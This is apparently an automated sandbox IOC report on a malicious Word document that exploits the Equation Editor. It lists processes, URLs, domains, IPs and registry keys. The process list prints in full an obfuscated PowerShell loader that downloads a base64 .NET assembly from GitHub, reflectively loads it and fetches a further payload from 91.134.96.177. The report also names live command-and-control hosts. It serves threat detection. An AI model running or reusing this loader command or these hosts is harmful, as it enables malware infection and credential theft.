Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding

C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\SysWOW64\wscript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"

There are 8 hidden processes, click here to show them.

URLs

Name

Malicious

http://91.134.96.177/80/WRRDFC.txt

91.134.96.177

maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro

http://91.134.96.177/80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc

91.134.96.177

http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIF

91.134.96.177

http://b.scorecardresearch.com/beacon.js

unknown

http://www.imvu.com/DK

unknown

http://acdn.adnxs.com/ast/ast.js

unknown

http://www.imvu.comr

unknown

http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_

unknown

http://ocsp.entrust.net03

unknown

https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1

unknown

https://contoso.com/License

unknown

https://support.google.com/chrome/?p=plugin_flash

unknown

http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png

unknown

http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0

unknown

http://www.diginotar.nl/cps/pkioverheid0

unknown

https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9

unknown

http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html

unknown

http://www.nirsoft.net

unknown

https://deff.nelreports.net/api/report?cat=msn

unknown

http://www.nirsoft.netP

unknown

https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js

unknown

http://go.micros

unknown

http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com

unknown

http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIFj

unknown

http://cache.btrll.com/default/Pix-1x1.gif

unknown

http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683

unknown

https://www.google.com

unknown

http://geoplugin.net/json.gp/C

unknown

https://og1.in/S7UYq0

172.67.216.244

http://o.aolcdn.com/ads/adswrappermsni.js

unknown

http://cdn.taboola.com/libtrc/msn-home-network/loader.js

unknown

http://www.msn.com/?ocid=iehp

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

unknown

http://static.chartbeat.com/js/chartbeat.js

unknown

http://www.msn.com/de-de/?ocid=iehp

unknown

http://91.134.96.177

unknown

http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%

unknown

https://login.yahoo.com/config/login

unknown

http://www.nirsoft.net/

unknown

http://ocsp.entrust.net0D

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3

unknown

http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683

unknown

http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(

unknown

https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9

unknown

http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh

unknown

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

185.199.109.133

http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js

unknown

http://nuget.org/NuGet.exe

unknown

https://www.ccleaner.com/go/app_cc_pro_trialkey

unknown

http://crl.entrust.net/server1.crl0

unknown

http://www.imvu.com/cK

unknown

https://contextual.media.net/8/nrrV73987.js

unknown

http://www.imvu.com

unknown

https://contoso.com/Icon

unknown

https://contextual.media.net/

unknown

http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js

unknown

https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2

unknown

http://www.msn.com/

unknown

https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au

unknown

http://geoplugin.net/json.gp

178.237.33.50

http://crl.pkioverheid.nl/DomOvLatestCRL.crl0

unknown

https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549

unknown

https://raw.githubusercontent.com

unknown

http://cdn.at.atwola.com/_media/uac/msn.html

unknown

https://www.google.com/accounts/servicelogin

unknown

http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset

unknown

https://secure.comodo.com/CPS0

unknown

http://91.134.96.177/80/uc/

unknown

http://go.microsoft.c9V

unknown

https://policies.yahoo.com/w3c/p3p.xml

unknown

http://crl.entrust.net/2048ca.crl0

unknown

http://www.msn.com/advertisement.ad.js

unknown

http://www.ebuddy.com

unknown

There are 67 hidden URLs, click here to show them.

Domains

Name

Malicious

og1.in

172.67.216.244

Details

Name:	og1.in
IP:	172.67.216.244
TargetID:	0
Current Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Microsoft Office launches external ms-search protocol handler (WebDAV)	Persistence and Installation Behavior
Contains an external reference to another file	Persistence and Installation Behavior
Potential document exploit detected (performs DNS queries)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (unknown TCP traffic)	Software Vulnerabilities	Exploitation for Client Execution
Sigma detected: Suspicious Office Outbound Connections	System Summary
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro

45.90.89.98

Details

Name:	maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
IP:	45.90.89.98
TargetID:	13
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
Suricata IDS alerts for network traffic	Networking
C2 URLs / IPs found in malware configuration	Networking	Application Layer Protocol
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Potential document exploit detected (performs DNS queries)	Software Vulnerabilities	Exploitation for Client Execution
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

raw.githubusercontent.com

185.199.109.133

Details

Name:	raw.githubusercontent.com
IP:	185.199.109.133
TargetID:	12
Current Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
Potential document exploit detected (performs DNS queries)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

geoplugin.net

178.237.33.50

Details

Name:	geoplugin.net
IP:	178.237.33.50
TargetID:	13
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
Potential document exploit detected (performs DNS queries)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Suricata IDS alerts with low severity for network traffic	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

45.90.89.98

maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro

Bulgaria

Details

IP:	45.90.89.98
TargetID:	13
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Country:	Bulgaria
Countrycode:	BGR
ASN number:	33657
ASN name:	CMCSUS
Private:	false
Domain:	maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

91.134.96.177

unknown

France

Details

IP:	91.134.96.177
TargetID:	0
Current Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Country:	France
Countrycode:	FRA
ASN number:	16276
ASN name:	OVHFR
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: EQNEDT32.EXE connecting to internet	Exploits
Suricata IDS alerts for network traffic	Networking
Microsoft Office drops suspicious files	System Summary
Office equation editor establishes network connection	Exploits	Exploitation for Client Execution
Sigma detected: Equation Editor Network Connection	System Summary
HTTP GET or POST without a user agent	Networking
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (unknown TCP traffic)	Software Vulnerabilities	Exploitation for Client Execution
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking

172.67.216.244

og1.in

United States

Details

IP:	172.67.216.244
TargetID:	0
Current Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Country:	United States
Countrycode:	USA
ASN number:	13335
ASN name:	CLOUDFLARENETUS
Private:	false
Domain:	og1.in

Signature Hits	Behavior Group	Mitre Attack
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (unknown TCP traffic)	Software Vulnerabilities	Exploitation for Client Execution
Sigma detected: Suspicious Office Outbound Connections	System Summary
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

104.21.78.54

unknown

United States

Details

IP:	104.21.78.54
TargetID:	0
Current Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Country:	United States
Countrycode:	USA
ASN number:	13335
ASN name:	CLOUDFLARENETUS
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Potential document exploit detected (unknown TCP traffic)	Software Vulnerabilities	Exploitation for Client Execution
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking

185.199.109.133

raw.githubusercontent.com

Netherlands

Details

IP:	185.199.109.133
TargetID:	12
Current Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Country:	Netherlands
Countrycode:	NLD
ASN number:	54113
ASN name:	FASTLYUS
Private:	false
Domain:	raw.githubusercontent.com

Signature Hits	Behavior Group	Mitre Attack
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Uses insecure TLS / SSL version for HTTPS connection	Compliance, Networking

178.237.33.50

geoplugin.net

Netherlands

Details

IP:	178.237.33.50
TargetID:	13
Current Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Country:	Netherlands
Countrycode:	NLD
ASN number:	8455
ASN name:	ATOM86-ASATOM86NL
Private:	false
Domain:	geoplugin.net

Signature Hits	Behavior Group	Mitre Attack
Potential document exploit detected (performs HTTP gets)	Software Vulnerabilities	Exploitation for Client Execution
Suricata IDS alerts with low severity for network traffic	Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\Software\Rmc-EPF38I

exepath

HKEY_CURRENT_USER\Software\Rmc-EPF38I

licence

HKEY_CURRENT_USER\Software\Rmc-EPF38I

time

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

*u/

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word

Enabled

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word

MTTT

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

av/

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

tx/

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache

Version

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache

Count

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/

Type

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/

Protocol

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/

Version

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/

Flags

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/

CobaltMajorVersion

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/

CobaltMinorVersion

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/

MsDavExt

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/

Expiration

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://og1.in/

EnableBHO

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

o?/

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle

ReviewToken

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached

{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\30D49

30D49

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057

Options Version

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 0

Name

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 0

Data

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 1

Name

HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Proofing Tools\Grammar\MSGrammar\3.0\2057\Option Set 1

Data